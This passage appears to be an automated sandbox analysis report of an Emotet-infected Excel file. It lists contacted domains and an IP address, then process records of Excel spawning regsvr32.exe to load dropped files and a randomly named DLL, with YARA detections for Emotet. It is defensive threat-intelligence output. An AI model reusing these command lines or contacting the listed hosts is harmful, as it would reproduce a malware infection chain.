                              • www.3d-stickers.com
                              • 218.38.121.17
                              • navylin.com


                              Target ID:0
                              Start time:12:40:13
                              Start date:15/11/2022
                              Path:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                              Wow64 process (32bit):false
                              Commandline:"C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
                              Imagebase:0x13f350000
                              File size:28253536 bytes
                              MD5 hash:D53B85E21886D2AF9815C377537BCAC3
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Reputation:high

                              Target ID:4
                              Start time:12:40:25
                              Start date:15/11/2022
                              Path:C:\Windows\System32\regsvr32.exe
                              Wow64 process (32bit):false
                              Commandline:C:\Windows\System32\regsvr32.exe ..\oxnv1.ooccxx
                              Imagebase:0xff180000
                              File size:19456 bytes
                              MD5 hash:59BCE9F07985F8A4204F4D6554CFF708
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Reputation:high

                              Target ID:5
                              Start time:12:40:27
                              Start date:15/11/2022
                              Path:C:\Windows\System32\regsvr32.exe
                              Wow64 process (32bit):false
                              Commandline:C:\Windows\System32\regsvr32.exe ..\oxnv2.ooccxx
                              Imagebase:0xff180000
                              File size:19456 bytes
                              MD5 hash:59BCE9F07985F8A4204F4D6554CFF708
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Reputation:high

                              Target ID:7
                              Start time:12:40:28
                              Start date:15/11/2022
                              Path:C:\Windows\System32\regsvr32.exe
                              Wow64 process (32bit):false
                              Commandline:C:\Windows\System32\regsvr32.exe ..\oxnv3.ooccxx
                              Imagebase:0xff180000
                              File size:19456 bytes
                              MD5 hash:59BCE9F07985F8A4204F4D6554CFF708
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Reputation:high

                              Target ID:8
                              Start time:12:40:32
                              Start date:15/11/2022
                              Path:C:\Windows\System32\regsvr32.exe
                              Wow64 process (32bit):false
                              Commandline:C:\Windows\System32\regsvr32.exe ..\oxnv4.ooccxx
                              Imagebase:0xff180000
                              File size:19456 bytes
                              MD5 hash:59BCE9F07985F8A4204F4D6554CFF708
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Yara matches:
                              • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000008.00000002.940135302.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000008.00000002.939239138.0000000002010000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                              Reputation:high

                              Target ID:9
                              Start time:12:40:34
                              Start date:15/11/2022
                              Path:C:\Windows\System32\regsvr32.exe
                              Wow64 process (32bit):false
                              Commandline:C:\Windows\system32\regsvr32.exe "C:\Windows\system32\SnILCOTnpOOFucYhP\FatGkw.dll"
                              Imagebase:0xff180000
                              File size:19456 bytes
                              MD5 hash:59BCE9F07985F8A4204F4D6554CFF708
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Yara matches:
                              • Rule: JoeSecurity_Emotet_3, Description: Yara detected Emotet, Source: 00000009.00000002.1210607529.000000000039A000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000009.00000002.1211244100.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000009.00000002.1210480334.00000000002B0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                              Reputation:high

                              Target ID:10
                              Start time:12:41:27
                              Start date:15/11/2022
                              Path:C:\Windows\System32\regsvr32.exe
                              Wow64 process (32bit):false
                              Commandline:C:\Windows\system32\regsvr32.exe" "C:\Windows\system32\SnILCOTnpOOFucYhP\FatGkw.dll
                              Imagebase:0xff180000
                              File size:19456 bytes
                              MD5 hash:59BCE9F07985F8A4204F4D6554CFF708
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Yara matches:
                              • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000A.00000002.1211898571.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000A.00000002.1210482177.00000000001D0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_Emotet_3, Description: Yara detected Emotet, Source: 0000000A.00000002.1210571701.00000000002BA000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security

                              No disassembly